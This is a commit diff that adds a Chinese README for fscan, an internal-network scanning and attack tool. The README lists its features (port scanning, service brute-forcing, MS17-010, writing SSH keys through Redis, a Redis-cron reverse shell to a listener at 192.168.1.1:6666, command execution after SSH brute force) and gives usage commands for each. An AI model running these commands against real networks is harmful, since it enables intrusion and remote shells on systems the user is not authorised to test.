mirror of
https://github.com/shadow1ng/fscan.git
synced 2026-09-25 04:31:52 +08:00
update
This commit is contained in:
@@ -1,2 +1,36 @@
|
|||||||
# fscan
|
# fscan
|
||||||
一款内网扫描工具,方便一键自动化大保健。
|
|
||||||
|
一款内网扫描工具,方便一键大保健。
|
||||||
|
支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写私钥、计划任务反弹shell、读取win网卡信息等。
|
||||||
|
趁着最近有空,用go把f-scrack重构了一遍。使用go来编写,也有更好的扩展性及兼容性。
|
||||||
|
还在逐步增加功能,欢迎各位师傅提意见。
|
||||||
|
|
||||||
|
## usege
|
||||||
|
```
|
||||||
|
go run main.go -h 192.168.1.1/24
|
||||||
|
fscan.exe -h 192.168.1.1/24
|
||||||
|
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写私钥)
|
||||||
|
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell)
|
||||||
|
fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后,命令执行)
|
||||||
|
```
|
||||||
|
|
||||||
|
`fscan.exe -h 192.168.x.x`
|
||||||
|

|
||||||
|
|
||||||
|
`fscan.exe -h 192.168.x.x -rf id_rsa.pub (redis 写私钥)`
|
||||||
|

|
||||||
|
|
||||||
|
|
||||||
|
`fscan.exe -h 192.168.x.x -c "whoami;id" (ssh 命令)`
|
||||||
|

|
||||||
|
|
||||||
|
|
||||||
|
`fscan.exe -h 192.168.x.x (ms17010、读取网卡信息)`
|
||||||
|

|
||||||
|
|
||||||
|
|
||||||
|
## 参考链接
|
||||||
|
https://github.com/Adminisme/ServerScan
|
||||||
|
https://github.com/netxfly/x-crack
|
||||||
|
https://github.com/hack2fun/Gscan
|
||||||
|
https://github.com/k8gege/LadonGo
|
||||||
BIN
Binary file not shown.
|
After Width: | Height: | Size: 418 KiB |
BIN
Binary file not shown.
|
After Width: | Height: | Size: 434 KiB |
BIN
Binary file not shown.
|
After Width: | Height: | Size: 488 KiB |
BIN
Binary file not shown.
|
After Width: | Height: | Size: 143 KiB |
Binary file not shown.
|
After Width: | Height: | Size: 476 KiB |
Reference in New Issue
Block a user